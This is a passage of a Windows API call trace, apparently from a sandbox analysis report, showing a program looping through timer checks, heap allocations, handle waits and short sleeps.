hHeap=0x2150000) returned 1 [0188.410] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.410] GetTickCount () returned 0x20f7882 [0188.410] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.410] GetTickCount () returned 0x20f7882 [0188.410] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.410] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0188.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.414] GetTickCount () returned 0x20f8128 [0188.414] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0188.414] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.414] GetTickCount () returned 0x20f8128 [0188.414] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.414] GetTickCount () returned 0x20f8128 [0188.414] GetTickCount () returned 0x20f8128 [0188.414] GetTickCount () returned 0x20f8128 [0188.414] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.414] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.414] GetTickCount () returned 0x20f8128 [0188.414] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.414] GetTickCount () returned 0x20f8128 [0188.414] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.414] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0188.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.418] GetTickCount () returned 0x20f89be [0188.418] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.418] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.418] GetTickCount () returned 0x20f89be [0188.418] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.418] GetTickCount () returned 0x20f89be [0188.418] GetTickCount () returned 0x20f89be [0188.418] GetTickCount () returned 0x20f89be [0188.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.418] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.418] GetTickCount () returned 0x20f89be [0188.419] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.419] GetTickCount () returned 0x20f89be [0188.419] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.419] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.422] GetTickCount () returned 0x20f9254 [0188.422] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.422] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.422] GetTickCount () returned 0x20f9254 [0188.422] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.422] GetTickCount () returned 0x20f9254 [0188.422] GetTickCount () returned 0x20f9254 [0188.422] GetTickCount () returned 0x20f9254 [0188.422] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.422] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.422] GetTickCount () returned 0x20f9254 [0188.422] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.422] GetTickCount () returned 0x20f9254 [0188.422] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.422] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.426] GetTickCount () returned 0x20f9aea [0188.426] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0188.426] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.426] GetTickCount () returned 0x20f9aea [0188.426] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.426] GetTickCount () returned 0x20f9aea [0188.426] GetTickCount () returned 0x20f9aea [0188.426] GetTickCount () returned 0x20f9aea [0188.426] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.426] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.426] GetTickCount () returned 0x20f9aea [0188.426] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.426] GetTickCount () returned 0x20f9aea [0188.426] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.426] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0188.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.429] GetTickCount () returned 0x20fa390 [0188.429] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b30 [0188.429] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.429] GetTickCount () returned 0x20fa390 [0188.429] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.429] GetTickCount () returned 0x20fa390 [0188.429] GetTickCount () returned 0x20fa390 [0188.429] GetTickCount () returned 0x20fa390 [0188.429] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.429] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.429] GetTickCount () returned 0x20fa390 [0188.429] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.429] GetTickCount () returned 0x20fa390 [0188.429] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.429] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b30 | out: hHeap=0x2150000) returned 1 [0188.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.433] GetTickCount () returned 0x20fac26 [0188.433] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0188.433] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.433] GetTickCount () returned 0x20fac26 [0188.433] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.433] GetTickCount () returned 0x20fac26 [0188.433] GetTickCount () returned 0x20fac26 [0188.433] GetTickCount () returned 0x20fac26 [0188.433] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.433] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.433] GetTickCount () returned 0x20fac26 [0188.433] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.433] GetTickCount () returned 0x20fac26 [0188.433] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.433] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0188.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.436] GetTickCount () returned 0x20fb4bc [0188.436] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.436] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.436] GetTickCount () returned 0x20fb4bc [0188.436] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.436] GetTickCount () returned 0x20fb4bc [0188.436] GetTickCount () returned 0x20fb4bc [0188.437] GetTickCount () returned 0x20fb4bc [0188.437] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.437] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.437] GetTickCount () returned 0x20fb4bc [0188.437] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.437] GetTickCount () returned 0x20fb4bc [0188.437] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.437] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.445] GetTickCount () returned 0x20fbd61 [0188.445] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.445] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.445] GetTickCount () returned 0x20fbd61 [0188.445] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.445] GetTickCount () returned 0x20fbd61 [0188.445] GetTickCount () returned 0x20fbd61 [0188.445] GetTickCount () returned 0x20fbd61 [0188.445] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.445] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.445] GetTickCount () returned 0x20fbd61 [0188.445] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.445] GetTickCount () returned 0x20fbd61 [0188.445] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.445] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.449] GetTickCount () returned 0x20fc5f7 [0188.449] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d70 [0188.449] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.449] GetTickCount () returned 0x20fc5f7 [0188.449] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.449] GetTickCount () returned 0x20fc5f7 [0188.449] GetTickCount () returned 0x20fc5f7 [0188.449] GetTickCount () returned 0x20fc5f7 [0188.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.449] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.449] GetTickCount () returned 0x20fc5f7 [0188.449] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.449] GetTickCount () returned 0x20fc5f7 [0188.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.449] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d70 | out: hHeap=0x2150000) returned 1 [0188.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.452] GetTickCount () returned 0x20fce8d [0188.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0188.452] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.452] GetTickCount () returned 0x20fce8d [0188.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.452] GetTickCount () returned 0x20fce8d [0188.452] GetTickCount () returned 0x20fce8d [0188.452] GetTickCount () returned 0x20fce8d [0188.452] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.452] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.453] GetTickCount () returned 0x20fce8d [0188.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.453] GetTickCount () returned 0x20fce8d [0188.453] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.453] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0188.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.456] GetTickCount () returned 0x20fd723 [0188.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.456] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.456] GetTickCount () returned 0x20fd723 [0188.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.456] GetTickCount () returned 0x20fd723 [0188.456] GetTickCount () returned 0x20fd723 [0188.456] GetTickCount () returned 0x20fd723 [0188.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.456] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.456] GetTickCount () returned 0x20fd723 [0188.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.456] GetTickCount () returned 0x20fd723 [0188.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.461] GetTickCount () returned 0x20fdfc9 [0188.461] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0188.461] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.461] GetTickCount () returned 0x20fdfc9 [0188.461] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.461] GetTickCount () returned 0x20fdfc9 [0188.462] GetTickCount () returned 0x20fdfc9 [0188.462] GetTickCount () returned 0x20fdfc9 [0188.462] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.462] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.462] GetTickCount () returned 0x20fdfc9 [0188.462] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.462] GetTickCount () returned 0x20fdfc9 [0188.462] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.462] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0188.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.465] GetTickCount () returned 0x20fe85f [0188.465] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0188.465] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.465] GetTickCount () returned 0x20fe85f [0188.465] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.465] GetTickCount () returned 0x20fe85f [0188.465] GetTickCount () returned 0x20fe85f [0188.465] GetTickCount () returned 0x20fe85f [0188.465] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.465] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.465] GetTickCount () returned 0x20fe85f [0188.465] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.465] GetTickCount () returned 0x20fe85f [0188.465] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.465] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0188.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.468] GetTickCount () returned 0x20ff0f5 [0188.468] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0188.468] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.468] GetTickCount () returned 0x20ff0f5 [0188.468] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.468] GetTickCount () returned 0x20ff0f5 [0188.468] GetTickCount () returned 0x20ff0f5 [0188.468] GetTickCount () returned 0x20ff0f5 [0188.468] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.468] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.468] GetTickCount () returned 0x20ff0f5 [0188.468] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.468] GetTickCount () returned 0x20ff0f5 [0188.468] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.468] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0188.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.473] GetTickCount () returned 0x20ff98b [0188.473] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.473] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.473] GetTickCount () returned 0x20ff98b [0188.473] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.473] GetTickCount () returned 0x20ff98b [0188.473] GetTickCount () returned 0x20ff98b [0188.473] GetTickCount () returned 0x20ff98b [0188.477] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.477] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.477] GetTickCount () returned 0x20ff99a [0188.477] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.477] GetTickCount () returned 0x20ff99a [0188.477] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.477] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.480] GetTickCount () returned 0x2100230 [0188.480] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0188.480] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.480] GetTickCount () returned 0x2100230 [0188.480] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.480] GetTickCount () returned 0x2100230 [0188.480] GetTickCount () returned 0x2100230 [0188.480] GetTickCount () returned 0x2100230 [0188.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.480] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.480] GetTickCount () returned 0x2100230 [0188.480] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.480] GetTickCount () returned 0x2100230 [0188.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0188.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.484] GetTickCount () returned 0x2100ac6 [0188.484] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0188.484] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.484] GetTickCount () returned 0x2100ac6 [0188.484] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.484] GetTickCount () returned 0x2100ac6 [0188.484] GetTickCount () returned 0x2100ac6 [0188.484] GetTickCount () returned 0x2100ac6 [0188.485] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.485] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.485] GetTickCount () returned 0x2100ac6 [0188.485] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.485] GetTickCount () returned 0x2100ac6 [0188.485] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.485] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0188.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.488] GetTickCount () returned 0x210135c [0188.488] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0188.488] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.488] GetTickCount () returned 0x210135c [0188.488] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.488] GetTickCount () returned 0x210135c [0188.488] GetTickCount () returned 0x210135c [0188.488] GetTickCount () returned 0x210135c [0188.488] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.488] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.488] GetTickCount () returned 0x210135c [0188.488] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.488] GetTickCount () returned 0x210135c [0188.488] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.488] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0188.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.493] GetTickCount () returned 0x2101c02 [0188.493] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.493] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.493] GetTickCount () returned 0x2101c02 [0188.493] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.493] GetTickCount () returned 0x2101c02 [0188.493] GetTickCount () returned 0x2101c02 [0188.493] GetTickCount () returned 0x2101c02 [0188.493] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.493] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.493] GetTickCount () returned 0x2101c02 [0188.493] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.493] GetTickCount () returned 0x2101c02 [0188.493] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.493] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.496] GetTickCount () returned 0x2102498 [0188.496] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0188.496] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.497] GetTickCount () returned 0x2102498 [0188.497] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.497] GetTickCount () returned 0x2102498 [0188.497] GetTickCount () returned 0x2102498 [0188.497] GetTickCount () returned 0x2102498 [0188.497] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.497] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.497] GetTickCount () returned 0x2102498 [0188.497] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.497] GetTickCount () returned 0x2102498 [0188.497] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.497] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0188.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.500] GetTickCount () returned 0x2102d2e [0188.500] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0188.500] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.500] GetTickCount () returned 0x2102d2e [0188.500] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.500] GetTickCount () returned 0x2102d2e [0188.500] GetTickCount () returned 0x2102d2e [0188.500] GetTickCount () returned 0x2102d2e [0188.500] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.500] WaitForSingleObject (hHandle=0x790, 